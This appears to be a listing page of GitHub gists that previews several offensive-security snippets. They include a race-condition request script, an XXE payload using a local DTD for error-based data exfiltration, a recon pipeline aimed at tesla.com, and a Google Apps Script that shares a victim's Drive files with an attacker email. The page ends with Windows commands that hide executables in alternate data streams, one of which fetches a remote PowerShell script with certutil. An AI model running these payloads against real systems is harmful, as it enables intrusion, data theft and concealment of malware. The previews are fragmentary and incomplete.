This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// This will use the single-packet attack for HTTP/2, and last-byte synchronisation for HTTP/1 | |
int NUMBER_OF_REQUESTS = 10; | |
var reqs = new ArrayList<HttpRequest>(); | |
for (int i = 0; i < NUMBER_OF_REQUESTS; i++) { | |
reqs.add(requestResponse.request()); | |
} | |
var responses = api().http().sendRequests(reqs); | |
var codes = responses.stream().map(HttpRequestResponse::response).filter(Objects::nonNull).map(HttpResponse::statusCode).toList(); | |
logging().logToOutput(codes); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from distutils.log import error | |
import sys, socket,os,pty | |
from django.conf import settings | |
from django.urls import include, re_path | |
from django.http import HttpResponse | |
settings.configure( | |
DEBUG=True, | |
ROOT_URLCONF=__name__ | |
) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/env python3 | |
import argparse | |
import datetime | |
import re | |
import sys | |
import uuid | |
############################################################################### | |
# Based off of Daniel Thatcher's guid tool |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#pip install ecdsa | |
# | |
import base64 | |
import hashlib | |
from hashlib import sha256 | |
import hmac | |
from ecdsa.ecdsa import Signature, generator_256 | |
from ecdsa import VerifyingKey, NIST256p |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE doc [ | |
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> | |
<!ENTITY % SuperClass '> | |
<!ENTITY % file SYSTEM "http://example.com:9200/_cat/indices"> | |
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://test/#%file;'>"> | |
%eval; | |
%error; | |
<!ENTITY test "test"' | |
> | |
%local_dtd; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json |jq -r '.vulnerabilities[].cveID' > cves.txt | |
subfinder -d tesla.com -silent |dnsx -silent -a -resp-only |sort -u |xargs -n1 -P 1500 -I% curl -s http://networktools.nl/whois/$url% |grep "CIDR" |cut -d : -f2 |tr , "\n"| awk '{$1=$1};1' |sort -u |egrep -v "/8|/9|/10|/11|/12|/13|/14|/15|/16" |while read ip ;do whois -h whois.cymru.com " -v $ip" ;done |grep -v "BGP Prefix" |cut -d '|' -f3 |awk '{$1=$1};1' |sort -u |cidr2ip |sort -u |nrich - |grep -B4 -f cves.txt | tee shodan.txt; slackcat --channel bugbounty --filename shodan.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import asyncio | |
import aiohttp | |
import time | |
import sys | |
import argparse | |
import os | |
parser = argparse.ArgumentParser(description='Directory Bruteforce') | |
parser.add_argument('-u', '--url', help='URL to bruteforce', required=True) | |
parser.add_argument('-w', '--wordlist', help='Wordlist to use', required=True) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function driveSearch() { | |
// Setup the exfil folder | |
var user = Session.getActiveUser().getEmail(); | |
var folder = DriveApp.createFolder(user); | |
var attackerEmail = "[email protected]"; | |
folder.addViewer(attackerEmail); | |
// Search Drive | |
var files = DriveApp.searchFiles('hidden = false'); | |
// Iterate through files in Drive |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
NewerOlder